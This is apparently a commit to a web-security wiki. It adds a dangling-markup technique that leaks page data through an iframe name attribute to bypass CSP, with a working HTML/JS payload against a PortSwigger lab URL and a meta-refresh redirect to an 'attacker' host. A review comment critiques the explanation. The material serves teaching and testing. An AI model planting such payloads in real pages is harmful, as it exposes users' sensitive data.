GitBook: [#3307] No subject

CPol 2022-07-04 10:37:21 +00:00 committed by gitbook-bot
parent b1dfcc0701
commit 48b89e1c52
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -221,6 +221,21 @@ Notice that a **child document can view and set location property for parent, ev
This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_
An iframe can also be abused to leak sensitive information from a different page **using the iframe name attribute**. This is because you can create an iframe that iframes itself abusing the HTML injection that makes the **sensitive info appear inside the iframe name attribute** and then access that name from the initial iframe and leak it.
```html
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
### \<meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
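Review bot: the added paragraph above the html block describes the technique as "an iframe that iframes itself", which does not match the payload under it, where the `email` parameter injects an unterminated `<iframe name='` into target.php. Suggest rewording it to say that the injected attribute is left open, so the page content that follows it ends up inside the name value. The paragraph also never explains the two steps in `cspBypass`: why `win[0].location` is set to `about:blank` before `win[0].name` is read, and why the read is delayed by a fixed 500 ms. One sentence on each would help, including a note that the timeout is a guess at load time and the read can fire before navigation completes. Since this section already gives a `sandbox` mitigation for the previous technique, the new one would be easier to use defensively with a matching line on what stops it, or at least a pointer to where the linked PortSwigger write-up covers that.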